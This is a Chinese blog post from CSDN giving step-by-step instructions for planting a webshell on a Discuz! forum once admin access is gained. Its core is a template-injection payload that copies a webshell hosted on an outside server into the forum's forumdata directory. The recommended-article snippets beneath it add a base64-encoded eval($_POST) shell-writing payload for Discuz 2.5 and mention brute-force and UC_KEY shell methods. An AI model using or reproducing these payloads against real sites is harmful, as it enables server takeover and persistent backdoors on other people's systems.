Discuz! 后台拿webshell万能方法

最新推荐文章于 2024-09-28 16:31:15 发布
最新推荐文章于 2024-09-28 16:31:15 发布
阅读量736 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6585535
版权

Discuz! 后台拿webshell万能方法:

前提条件:要拿到论坛管理员的密码,能够编辑模板文件

步骤:
1. 找一个空间上传一个wehsehll,注意这个webshell不要让服务器解析,一般使用txt文件就可以了。地址如:http://www.51safe.net/webshell.txt
2.随便选择一个模板(如:my),然后在任意位置输入:
 

PHP代码
  1. {eval copy('http://www.51safe.net/webshell.txt', DISCUZ_ROOT.'./forumdata/webshell.php');}   

3.保存,然后更新论坛缓存,更新模板缓存
4.访问该模板所属的php文件(如:my.php)
5.把模板修改成原始状态
这样一个webshell就生成了,地址是:http://论坛地址/forumdata/webshell.php
 

7禧
关注
专栏目录
[原创]K8飞刀Final
K8哥哥
04-15 5622
法律声明: 工具仅供安全研究或授权渗透,非法用途后果自负。工具: K8飞刀Final作者: K8哥哥博客: https://www.cnblogs.com/k8gege简介: 一款多功能网络安全渗透测试工具(Hacker Swiss Army Knife) 1.漏洞利用: 已集成20个主流WEB、CMS程序,累计115个EXP(如Drupal、Joomla、...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5573
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Discuz!后台怎么拿到Webshell
Yatere的天平秤
04-25 2252
趁着地球还没毁灭,赶紧放出来。 预祝"单恋一枝花"童鞋生日快乐。 恭喜我的浩方Dota升到2级。 希望世界和平。 我不是标题党,你们敢踩我。敢踩我。。踩我。。。我…… 既然还没跪,我就从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。 一 Discuz! 6.0 和 Discuz! 7.0 既然要后台Shell,文件写入必看。
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
编写自己的Acunetix WVS漏洞扫描脚本详细教程
weixin_33924312的博客
03-17 848
AWVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章 本文以8.0为例,首先呢安装好Acunetix Web Vulnerability Scanner 8(该破解的破解,该付费的付费),然后我们需要WVS公开的小小的SDK,下载地址:http://www.acunetix.com/download/t...
discuz论坛用户密码加密原理
czh0423的专栏
11-17 7442
一般我们的加密都是采用md5加密方式:md5(变量)。但是昨天需要整合discuz的论坛,看   他的加密方式也像是md5,但是简单的123加密后竟然解密不出来。后来在网上查了一下,   发现他不只是简单的md5加密,而是“md5+随机”。当然这样更安全了。     网站安全了,程序自然也就复杂了...     discuz的加密方式:md5(md5($password).$salt)
DISCUZ——后台管理密码ko方案
程序猿在武汉
08-01 1793
一、Discuz!的管理员(用户)密码存在哪里?   要想修改或找回密码,我们要明白他的密码存在哪里。自从UCenter诞生以来,所有要通过它实现数据同步的产品(如:Discuz!UCHome,SS等等),用户信息都存在了UCenter的数据库里的_members表中,而非产品自身的数据库里。拿DZ来说,在DZ的数据库中同样有_members表(pre_ucenter_members)
Web渗透之信息收集技术(附实战练习)
Matheus的博客
05-13 2508
先附上思维导图方便查阅???? 1、收集子域信息 子域名检测工具: Layer子域名挖掘机,K8,wydomain,Sublist3r,dnsmaper,subDomainsBrute,Maltego CE 搜索引擎枚举: 可以利用前面的google黑客语法。列如:搜索百度旗下的子域名就可以使用“site:baidu.com”, site:baidu.com –www 不包含www 第三方聚合应用枚举: 很多第三方服务汇聚了大量DNS数据集,可通过它们检索某个给定域名的子域名。只要往其搜索栏中输入域名,
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3210
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
渗透测试
Sisyphuss Blog
06-02 3919
渗透测试概述 目录如下: 文章目录渗透测试概述简介:渗透测试与入侵的最大区别:渗透的目的:渗透可能利用的途径:常用名词:一般渗透测试流程明确目标信息收集漏洞探索方法:漏洞验证信息分析获取所需信息整理形成报告流程总结信息收集的补充:下面是一些基本的搜索语法:查找后台查看服务器使用的程序查看上传漏洞查找注射点这里推荐一个工具:heHarvester:Whois信息收集:**whois信息查询****子...
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
Discuz!后台密码穷举工具 无视IP验证
风炫 致力于顶级网络安全专家
01-29 6374
自己写了一个Discuz后台密码穷举工具,无视IP验证,配合社工库和弱口令字典。拿去看看吧 <?php /** Author : fengxuan Date : 2014-11-25 */ class FuckDiscuz{ public $userfile; public $passfile; public $outfile; public $url; public
DZshell总结
weixin_30600503的博客
01-23 786
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
DZ!2.5 后台WebShell 方法
fengling132的专栏
05-09 1800
直都没找到DZ! 2.5后台shell方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
基于php的幸运舞蹈课程工作室管理系统
最新发布
计算机学姐的博客
09-28 783
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP中error_reporting函数作用
sheji888的专栏
09-24 860
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
Discuz! 6.0-7.0后台Webshell漏洞利用教程
论坛软件不同版本(如2011年及其之前,包括6.0和7.0)的后台获取Webshell漏洞利用技术。Discuz!是一个流行的PHP论坛系统,其安全漏洞常常成为攻击者的目标。文章的核心焦点在于利用Discuz!扩展插件中的漏洞进行文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值